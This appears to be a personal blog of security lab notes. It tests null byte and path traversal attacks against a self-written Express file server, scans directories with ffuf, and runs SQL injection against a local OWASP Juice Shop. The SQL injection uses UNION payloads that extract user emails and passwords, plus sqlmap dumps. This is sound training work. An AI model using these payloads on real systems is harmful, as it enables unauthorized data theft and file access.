Monday, January 31, 2022
Saturday, January 29, 2022
null byte injection prevention
ftp site has public and secret file links
click public file link shows public file
click secret file link, a warning message displays
text in secret file: This is a secret file for admin
try to view files outside ftp folder, access is denied
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64%2f
is encoded url for ../../etc/passwd/
try to inject null byte %00 to bypass file type check, attempt failed
//logs
Example app listening at http://localhost:8080
/home/kali/Documents/ftp/public.txt .txt
/home/kali/Documents/ftp/secret.md .md
/home/kali/etc/passwd/public.txt .txt
/home/kali/Documents/ftp/secret.md%00.txt .txt
const express = require('express')
const app = express()
const port = 8080
const path = require('path');
var fs = require('fs'),
http = require('http');
var bodyParser = require('body-parser')
app.use(bodyParser.json()); // to support JSON-encoded bodies
app.use(bodyParser.urlencoded({ // to support URL-encoded bodies
extended: true
}));
//render html
app.set('view engine', 'ejs');
app.engine('html', require('ejs').renderFile);
app.get('/ftp/', function (req, res) {
res.render('ftp');
});
app.get('/ftp/:fileName', function (req, res) {
var ftpDir = path.join(__dirname, "ftp")
var downloadLink = path.join(ftpDir, req.params.fileName)
console.log(downloadLink, path.extname(downloadLink))
if (downloadLink.indexOf(ftpDir) !== 0) {
res.send('trying to sneak out of the ftp directory?');
return
}
if (req.params.fileName.indexOf('\0') !== -1) {
res.send('trying to breach file type filter?');
return
}
if (path.extname(downloadLink) !== ".txt") {
res.send('trying to download secret file?');
return
}
fs.readFile(downloadLink, function (err, data) {
if (err) {
res.writeHead(404);
res.end(JSON.stringify(err));
return;
}
res.writeHead(200);
res.end(data);
});
});
app.listen(port, () => {
console.log(`Example app listening at http://localhost:${port}`)
})
--------------------
//views/ftp.ejs
<html>
<head>
<%- include('partials/header'); %>
</head>
<body>
<div style="margin:100px;">
<%- include('partials/nav'); %>
<div class="jumbotron" style="padding:40px;">
<h3>ftp</h3>
<a href="/ftp/public.txt">public txt file</a>
<a href="/ftp/secret.md">secret md file</a>
</div>
</div>
</body>
</html>
reference:
null byte injection
Null Byte Injection is an exploitation technique used to bypass sanity checking filters in infrastructure by adding URLnull-byte-injection-encoded null byte characters (i.e., %00, or 0x00 in hex) to the user-supplied data. This injection process can alter the intended logic of the application and allow an attacker to get unauthorized access to system files.
All languages of the web are exploitable with this if your code isn't sanitizing input -OR- parsing files properly. Null bytes are put in place to terminate strings or be a place holder in code, and injecting these into URLs can cause web applications to not know when to terminate strings and manipulate the applications for purposes such as LFI/RFI (Local and Remote File Inclusion).
ftp directory
.md files can be accessed
.bak files are inaccessible
%25%30%30 is url encoded %00, add it to url followed by allowed .md type
file type filter is breached, files are downloaded
reference:
Friday, January 28, 2022
ffuf directory scanner
find most response length is 1987
(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost:3000/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://localhost:3000/#/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
_code [Status: 200, Size: 1987, Words: 207, Lines: 30]
[Status: 200, Size: 1987, Words: 207, Lines: 30]
.bash_history [Status: 200, Size: 1987, Words: 207, Lines: 30]
.bashrc [Status: 200, Size: 1987, Words: 207, Lines: 30]
.cache [Status: 200, Size: 1987, Words: 207, Lines: 30]
.config [Status: 200, Size: 1987, Words: 207, Lines: 30]
.cvs [Status: 200, Size: 1987, Words: 207, Lines: 30]
.listings [Status: 200, Size: 1987, Words: 207, Lines: 30]
.mysql_history [Status: 200, Size: 1987, Words: 207, Lines: 30]
.passwd [Status: 200, Size: 1987, Words: 207, Lines: 30]
.htpasswd [Status: 200, Size: 1987, Words: 207, Lines: 30]
.listing [Status: 200, Size: 1987, Words: 207, Lines: 30]
.perf [Status: 200, Size: 1987, Words: 207, Lines: 30]
.cvsignore [Status: 200, Size: 1987, Words: 207, Lines: 30]
.htaccess [Status: 200, Size: 1987, Words: 207, Lines: 30]
.profile [Status: 200, Size: 1987, Words: 207, Lines: 30]
.forward [Status: 200, Size: 1987, Words: 207, Lines: 30]
.history [Status: 200, Size: 1987, Words: 207, Lines: 30]
_cache [Status: 200, Size: 1987, Words: 207, Lines: 30]
.sh_history [Status: 200, Size: 1987, Words: 207, Lines: 30]
_catalogs [Status: 200, Size: 1987, Words: 207, Lines: 30]
.rhosts [Status: 200, Size: 1987, Words: 207, Lines: 30]
.ssh [Status: 200, Size: 1987, Words: 207, Lines: 30]
.svn/entries [Status: 200, Size: 1987, Words: 207, Lines: 30]
.svn [Status: 200, Size: 1987, Words: 207, Lines: 30]
_backup [Status: 200, Size: 1987, Words: 207, Lines: 30]
.swf [Status: 200, Size: 1987, Words: 207, Lines: 30]
_assets [Status: 200, Size: 1987, Words: 207, Lines: 30]
_baks [Status: 200, Size: 1987, Words: 207, Lines: 30]
_borders [Status: 200, Size: 1987, Words: 207, Lines: 30]
@ [Status: 200, Size: 1987, Words: 207, Lines: 30]
.git/HEAD [Status: 200, Size: 1987, Words: 207, Lines: 30]
.hta [Status: 200, Size: 1987, Words: 207, Lines: 30]
_archive [Status: 200, Size: 1987, Words: 207, Lines: 30]
.web [Status: 200, Size: 1987, Words: 207, Lines: 30]
_ [Status: 200, Size: 1987, Words: 207, Lines: 30]
_admin [Status: 200, Size: 1987, Words: 207, Lines: 30]
_ajax [Status: 200, Size: 1987, Words: 207, Lines: 30]
_adm [Status: 200, Size: 1987, Words: 207, Lines: 30]
.subversion [Status: 200, Size: 1987, Words: 207, Lines: 30]
_common [Status: 200, Size: 1987, Words: 207, Lines: 30]
_conf [Status: 200, Size: 1987, Words: 207, Lines: 30]
_config [Status: 200, Size: 1987, Words: 207, Lines: 30]
_css [Status: 200, Size: 1987, Words: 207, Lines: 30]
_data [Status: 200, Size: 1987, Words: 207, Lines: 30]
_database [Status: 200, Size: 1987, Words: 207, Lines: 30]
_derived [Status: 200, Size: 1987, Words: 207, Lines: 30]
_dev [Status: 200, Size: 1987, Words: 207, Lines: 30]
_dummy [Status: 200, Size: 1987, Words: 207, Lines: 30]
_files [Status: 200, Size: 1987, Words: 207, Lines: 30]
_flash [Status: 200, Size: 1987, Words: 207, Lines: 30]
_fpclass [Status: 200, Size: 1987, Words: 207, Lines: 30]
_images [Status: 200, Size: 1987, Words: 207, Lines: 30]
_img [Status: 200, Size: 1987, Words: 207, Lines: 30]
_inc [Status: 200, Size: 1987, Words: 207, Lines: 30]
_include [Status: 200, Size: 1987, Words: 207, Lines: 30]
_includes [Status: 200, Size: 1987, Words: 207, Lines: 30]
_install [Status: 200, Size: 1987, Words: 207, Lines: 30]
filter out response with size other than 1987
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost:3000/FUZZ -fs 1987
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://localhost:3000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 1987
________________________________________________
assets [Status: 301, Size: 179, Words: 7, Lines: 11]
ftp [Status: 200, Size: 11072, Words: 1568, Lines: 357]
promotion [Status: 200, Size: 6586, Words: 560, Lines: 177]
robots.txt [Status: 200, Size: 28, Words: 3, Lines: 2]
snippets [Status: 200, Size: 683, Words: 1, Lines: 1]
video [Status: 200, Size: 10075518, Words: 0, Lines: 0]
Video [Status: 200, Size: 10075518, Words: 0, Lines: 0]
:: Progress: [4614/4614] :: Job [1/1] :: 140 req/sec :: Duration: [0:00:37] :: Errors: 0 ::
exposed sensitive directory http://localhost:3000/ftp
reference:
Thursday, January 27, 2022
Tuesday, January 25, 2022
burp suite union attack owasp juice shop
obtain table names from sqlite_master with union injection
GET /rest/products/search?q=apple'))UNION%20SELECT%20tbl_name,2,3,4,5,6,7,8,9%20from%20sqlite_schema--
found Users table in previous step, obtain columns from Users table
GET /rest/products/search?q=apple'))UNION%20SELECT%20sql,2,3,4,5,6,7,8,9%20from%20sqlite_schema--
found column name email, password from previous step, obtain login info from Users table
GET /rest/products/search?q=apple'))UNION%20SELECT%20email,password,3,4,5,6,7,8,9%20from%20Users--
reference:
sqlite_schema
CREATE TABLE sqlite_schema(
type text,
name text,
tbl_name text,
rootpage integer,
sql text
);
Monday, January 24, 2022
sqlmap hack owasp juice shop 2
(kali㉿kali)-[~/Downloads/sqlmap/sqlmap-dev]
└─$ sqlmap -u http://localhost:3000/rest/products/search?q= --dbs --level=3 --risk=3
23:30:33] [INFO] testing SQLite
[23:30:33] [INFO] confirming SQLite
[23:30:33] [INFO] actively fingerprinting SQLite
[23:30:33] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
─(kali㉿kali)-[~/Downloads/sqlmap/sqlmap-dev]
└─$ sqlmap -u http://localhost:3000/rest/products/search?q= --schema
___
__H__
___ ___[.]_____ ___ ___ {1.5.8#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:36:03 /2022-01-24/
[23:36:04] [WARNING] provided value for parameter 'q' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:36:04] [INFO] resuming back-end DBMS 'sqlite'
[23:36:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=') AND 7040=7040 AND ('OyLh' LIKE 'OyLh
---
[23:36:04] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[23:36:04] [INFO] enumerating database management system schema
[23:36:04] [INFO] fetching tables for database: 'SQLite_masterdb'
[23:36:04] [INFO] fetching number of tables for database 'SQLite_masterdb'
[23:36:04] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:36:04] [INFO] retrieved: 20
[23:36:04] [INFO] retrieved: sqlite_sequence
[23:36:07] [INFO] retrieved: Users
[23:36:08] [INFO] retrieved: Addresses
[23:36:10] [INFO] retrieved: Baskets
[23:36:11] [INFO] retrieved: Products
[23:36:12] [INFO] retrieved: BasketItems
[23:36:14] [INFO] retrieved: Captchas
[23:36:15] [INFO] retrieved: Cards
[23:36:16] [INFO] retrieved: Challenges
[23:36:17] [INFO] retrieved: Complaints
[23:36:18] [INFO] retrieved: Deliveries
[23:36:20] [INFO] retrieved: Feedbacks
[23:36:21] [INFO] retrieved: ImageCaptchas
[23:36:23] [INFO] retrieved: Memories
[23:36:25] [INFO] retrieved: PrivacyRequests
[23:36:27] [INFO] retrieved: Quantities
[23:36:28] [INFO] retrieved: Recycles
[23:36:30] [INFO] retrieved: SecurityQuestions
[23:36:32] [INFO] retrieved: SecurityAnswers
[23:36:34] [INFO] retrieved: Wallets
[23:36:35] [INFO] fetched tables: 'SQLite_masterdb.Addresses', 'SQLite_masterdb.SecurityQuestions', 'SQLite_masterdb.Baskets', 'SQLite_masterdb.Captchas', 'SQLite_masterdb.BasketItems', 'SQLite_masterdb.Wallets', 'SQLite_masterdb.Products', 'SQLite_masterdb.sqlite_sequence', 'SQLite_masterdb.Feedbacks', 'SQLite_masterdb.Quantities', 'SQLite_masterdb.Recycles', 'SQLite_masterdb.Cards', 'SQLite_masterdb.Complaints', 'SQLite_masterdb.Users', 'SQLite_masterdb.ImageCaptchas', 'SQLite_masterdb.Deliveries', 'SQLite_masterdb.SecurityAnswers', 'SQLite_masterdb.PrivacyRequests', 'SQLite_masterdb.Challenges', 'SQLite_masterdb.Memories'
[23:36:35] [INFO] retrieved: CREATE TABLE `Addresses` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `fullName` VARCHAR(255), `mobileNum` INTEGER, `zipCode` VARCHAR(255), `streetAddress` VARCHAR(255), `city` VARCHAR(255), `state` VARCHAR(255), `country` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:37:36] [INFO] retrieved: CREATE TABLE `SecurityQuestions` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `question` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL)
[23:38:02] [INFO] retrieved: CREATE TABLE `Baskets` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `coupon` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:38:40] [INFO] retrieved: CREATE TABLE `Captchas` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `captchaId` INTEGER, `captcha` VARCHAR(255), `answer` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL)
[23:39:12] [INFO] retrieved: CREATE TABLE `BasketItems` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `quantity` INTEGER, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `BasketId` INTEGER REFERENCES `Baskets` (`id`) ON DELETE CASCADE ON UPDATE CASCADE, `ProductId` INTEGER REFERENCES `Products` (`id`) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (`BasketId`, `ProductId`))
[23:40:09] [INFO] retrieved: CREATE TABLE `Wallets` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `balance` INTEGER DEFAULT 0, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:40:48] [INFO] retrieved: CREATE TABLE `Products` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` VARCHAR(255), `description` VARCHAR(255), `price` DECIMAL, `deluxePrice` DECIMAL, `image` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `deletedAt` DATETIME)
[23:41:30] [INFO] retrieved: CREATE TABLE sqlite_sequence(name,seq)
[23:41:36] [INFO] retrieved: CREATE TABLE `Feedbacks` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `comment` VARCHAR(255), `rating` INTEGER NOT NULL, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:42:18] [INFO] retrieved: CREATE TABLE `Quantities` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `quantity` INTEGER, `limitPerUser` INTEGER DEFAULT NULL, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `ProductId` INTEGER REFERENCES `Products` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:43:03] [INFO] retrieved: CREATE TABLE `Recycles` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `quantity` INTEGER(4), `isPickup` TINYINT(1) DEFAULT 0, `date` DATETIME, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE, `AddressId` INTEGER REFERENCES `Addresses` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:44:03] [INFO] retrieved: CREATE TABLE `Cards` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `fullName` VARCHAR(255), `cardNum` INTEGER, `expMonth` INTEGER, `expYear` INTEGER, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:44:50] [INFO] retrieved: CREATE TABLE `Complaints` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `message` VARCHAR(255), `file` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId`^C
[*] ending @ 23:45:21 /2022-01-24/
reference:
sqlmap hack owasp juice shop
──(kali㉿kali)-[~/Downloads/sqlmap/sqlmap-dev]
└─$ python sqlmap.py -u 'http://localhost:3000/rest/products/search?q=test' -p 'q' --dbms="sqlite" --technique U --prefix "')) " --level 5 --risk 3 --dump-all --no-cast --no-escape --flush
___
__H__
___ ___[.]_____ ___ ___ {1.6.1.7#dev}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:07:08 /2022-01-24/
[23:07:08] [INFO] flushing session file
[23:07:08] [INFO] testing connection to the target URL
[23:07:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:07:08] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[23:07:08] [INFO] testing for SQL injection on GET parameter 'q'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n
[23:07:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:07:13] [INFO] target URL appears to be UNION injectable with 9 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[23:07:27] [INFO] GET parameter 'q' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[23:07:27] [INFO] checking if the injection point on GET parameter 'q' is a false positive
[23:07:28] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'q' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: q (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: q=test')) UNION ALL SELECT 46,46,46,46,46,'qxxvq'||'fcxvWpdSHxEBGIzlgpIxXNqeYluBvSKJcIwrEBpm'||'qzvvq',46,46,46-- syas
---
[23:07:35] [INFO] testing SQLite
[23:07:35] [INFO] confirming SQLite
[23:07:35] [INFO] actively fingerprinting SQLite
[23:07:35] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[23:07:35] [INFO] sqlmap will dump entries of all tables from all databases now
[23:07:35] [INFO] fetching tables for database: 'SQLite_masterdb'
[23:07:35] [INFO] fetching columns for table 'SecurityQuestions'
[23:07:35] [INFO] fetching entries for table 'SecurityQuestions'
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','1','Your eld...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','2','Mother's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','3','Mother's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','4','Father's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','5','Maternal...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','6','Paternal...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','7','Name of ...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','8','Last nam...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','9','Your ZIP...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','10','Company...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','11','Your fa...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','12','Your fa...
[23:07:36] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','13','Number ...
[23:07:36] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','14','What's ...
Database: <current>
Table: SecurityQuestions
[14 entries]
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+
| id | 255 | question | updatedAt | createdAt |
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+
| 1 | 255 | Your eldest siblings middle name? | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 2 | 255 | Mother's maiden name? | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 3 | 255 | Mother's birth date? (MM/DD/YY) | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 4 | 255 | Father's birth date? (MM/DD/YY) | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 5 | 255 | Maternal grandmother's first name? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 6 | 255 | Paternal grandmother's first name? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 7 | 255 | Name of your favorite pet? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 8 | 255 | Last name of dentist when you were a teenager? (Do not include 'Dr.') | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 9 | 255 | Your ZIP/postal code when you were a teenager? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 10 | 255 | Company you first work for as an adult? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 11 | 255 | Your favorite book? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 12 | 255 | Your favorite movie? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 13 | 255 | Number of one of your customer or ID cards? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 14 | 255 | What's your favorite place to go hiking? | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+
[23:07:36] [INFO] table 'SQLite_masterdb.SecurityQuestions' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/SecurityQuestions.csv'
[23:07:36] [INFO] fetching columns for table 'ImageCaptchas'
[23:07:36] [INFO] fetching entries for table 'ImageCaptchas'
[23:07:36] [WARNING] unable to retrieve the entries for table 'ImageCaptchas' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Addresses'
[23:07:36] [INFO] fetching entries for table 'Addresses'
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] unable to retrieve the entries for table 'Addresses' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Recycles'
[23:07:36] [INFO] fetching entries for table 'Recycles'
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] unable to retrieve the entries for table 'Recycles' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Wallets'
[23:07:36] [INFO] fetching entries for table 'Wallets'
[23:07:36] [INFO] retrieved: '1','0','2022-01-25 02:53:33.952 +00:00','1','2022-0...
[23:07:36] [INFO] retrieved: '2','100','2022-01-25 02:53:33.952 +00:00','2','2022...
[23:07:36] [INFO] retrieved: '3','0','2022-01-25 02:53:33.952 +00:00','3','2022-0...
[23:07:36] [INFO] retrieved: '4','0','2022-01-25 02:53:33.952 +00:00','4','2022-0...
[23:07:36] [INFO] retrieved: '5','0','2022-01-25 02:53:33.952 +00:00','5','2022-0...
[23:07:36] [INFO] retrieved: '6','0','2022-01-25 02:53:33.952 +00:00','6','2022-0...
[23:07:36] [INFO] retrieved: '7','100','2022-01-25 02:53:33.952 +00:00','7','2022...
[23:07:36] [INFO] retrieved: '8','0','2022-01-25 02:53:33.952 +00:00','8','2022-0...
[23:07:37] [INFO] retrieved: '9','0','2022-01-25 02:53:33.952 +00:00','9','2022-0...
[23:07:37] [INFO] retrieved: '10','0','2022-01-25 02:53:33.952 +00:00','10','2022...
[23:07:37] [INFO] retrieved: '11','0','2022-01-25 02:53:33.952 +00:00','11','2022...
[23:07:37] [INFO] retrieved: '12','0','2022-01-25 02:53:33.952 +00:00','12','2022...
[23:07:37] [INFO] retrieved: '13','0','2022-01-25 02:53:33.952 +00:00','13','2022...
[23:07:37] [INFO] retrieved: '14','0','2022-01-25 02:53:33.953 +00:00','14','2022...
[23:07:37] [INFO] retrieved: '15','0','2022-01-25 02:53:33.953 +00:00','15','2022...
[23:07:37] [INFO] retrieved: '16','100','2022-01-25 02:53:33.953 +00:00','16','20...
[23:07:37] [INFO] retrieved: '17','200','2022-01-25 02:53:33.953 +00:00','17','20...
[23:07:37] [INFO] retrieved: '18','0','2022-01-25 02:53:33.953 +00:00','18','2022...
[23:07:37] [INFO] retrieved: '19','0','2022-01-25 02:53:33.953 +00:00','19','2022...
[23:07:37] [INFO] retrieved: '20','0','2022-01-25 02:53:33.953 +00:00','20','2022...
Database: <current>
Table: Wallets
[20 entries]
+----+--------+---------+--------------------------------+--------------------------------+
| id | UserId | balance | updatedAt | createdAt |
+----+--------+---------+--------------------------------+--------------------------------+
| 1 | 1 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 2 | 2 | 100 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 3 | 3 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 4 | 4 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 5 | 5 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 6 | 6 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 7 | 7 | 100 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 8 | 8 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 9 | 9 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 10 | 10 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 11 | 11 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 12 | 12 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 13 | 13 | 0 | 2022-01-25 02:53:33.952 +00:00 | 2022-01-25 02:53:33.952 +00:00 |
| 14 | 14 | 0 | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 15 | 15 | 0 | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 16 | 16 | 100 | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 17 | 17 | 200 | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 18 | 18 | 0 | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 19 | 19 | 0 | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
| 20 | 20 | 0 | 2022-01-25 02:53:33.953 +00:00 | 2022-01-25 02:53:33.953 +00:00 |
+----+--------+---------+--------------------------------+--------------------------------+
[23:07:37] [INFO] table 'SQLite_masterdb.Wallets' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/Wallets.csv'
[23:07:37] [INFO] fetching columns for table 'Memories'
